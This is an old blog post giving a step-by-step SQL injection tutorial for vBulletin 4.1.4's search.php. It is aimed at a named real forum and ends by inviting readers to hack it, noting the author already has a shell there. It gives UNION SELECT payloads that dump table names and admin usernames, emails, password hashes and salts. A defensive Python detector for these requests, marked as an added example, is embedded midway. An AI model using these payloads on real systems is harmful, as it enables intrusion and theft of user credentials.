Monday, 12 December 2011

vBulletin 4.1.4 exploit tutorial

http://www.optikal-market.com/

Yeah, it's my mate's CC forum that was shit so he doesn't use it; it's 4.1.4.

So make an acc or whatever... I'll be using my acc, admin.
Once you make an acc, go to group.php:

http://optikal-market.com/group.php
For this, if there is already a group there you don't need to make one.
Remember the group id you see when you hover over Join Group; here it is 1.
Join the group and make a discussion called anything; for me it's awesome1337.
So now what you must remember:
the groupid you joined = 1
the discussion you made in that group = awesome1337
So now go to search.php
http://www.optikal-market.com/search.php
and do this:
tick group messages
tick exact name
search awesome1337
like so:
http://www.img.lc/i/selection0.png
Open HTTP headers, tick Capture, and then search on the target!

When the URL is loaded, go to your HTTP headers and there should be something like this:
http://www.img.lc/i/selectjvj.png
Click the one that is highlighted in my pic, and click the Replay button.
Then there should be something like this:
http://www.img.lc/i/selectxux.png
Now this is the crucial injection data.
I'll break it down:
vulnerable param: messagegroupid
nulling param: messagegroupid[0]
=1: groupid
union select blah blah: injection
So here's the full code for getting a certain admin's pass:
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#




For my site it's from vb_user
because I made the tables like that.
Most sites are just: user
Some sites are different, so use your brain to get the tables.
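
A defender's view of the request broken down above, as an added example that is not part of the original post: a Python check that flags POSTs to search.php whose messagegroupid[...] or cat[...] values are not plain integers. The record layout, the query field name and the sample IPs are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Parameter names taken from the tutorial above; both should only carry integer ids.
INT_ARRAY_PARAMS = ("messagegroupid", "cat")
INDEXED = re.compile(r"^(?:%s)\[[^\]]*\]$" % "|".join(INT_ARRAY_PARAMS))
SQL_HINT = re.compile(r"\bunion\b.*\bselect\b|information_schema|concat\s*\(", re.I)


def audit_body(body):
    """Return (param, value, reason) for every id parameter that is not a plain integer."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if not INDEXED.match(name):
            continue
        if re.fullmatch(r"[0-9]+", value):
            continue  # what a legitimate search form submits
        reason = "sql-syntax" if SQL_HINT.search(value) else "non-integer"
        findings.append((name, value, reason))
    return findings


def scan(records):
    """Return (client, findings) for POSTs to search.php that carry a bad id value."""
    hits = []
    for rec in records:
        if rec["method"] != "POST" or not rec["path"].endswith("/search.php"):
            continue
        found = audit_body(rec["body"])
        if found:
            hits.append((rec["client"], found))
    return hits


# Constructed sample records (documentation IP ranges, assumed "query" field), not real traffic.
SAMPLE = [
    {"client": "192.0.2.10", "method": "POST", "path": "/search.php",
     "body": "query=awesome1337&messagegroupid%5B0%5D=1"},
    {"client": "203.0.113.7", "method": "POST", "path": "/search.php",
     "body": "query=awesome1337&messagegroupid[0]=1"
             "&cat[0]=1) UNION SELECT database()#"},
    {"client": "203.0.113.7", "method": "POST", "path": "/search.php",
     "body": "query=awesome1337&messagegroupid[0]=abc"},
]

if __name__ == "__main__":
    for client, found in scan(SAMPLE):
        for name, value, reason in found:
            print(f"{client} {name}={value!r} -> {reason}")
```

Flagging is a stopgap for log review or a WAF rule; the durable fix is casting these ids to integers server-side and patching the forum.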



Hack the site if you want lol, I already shelled it anyway.
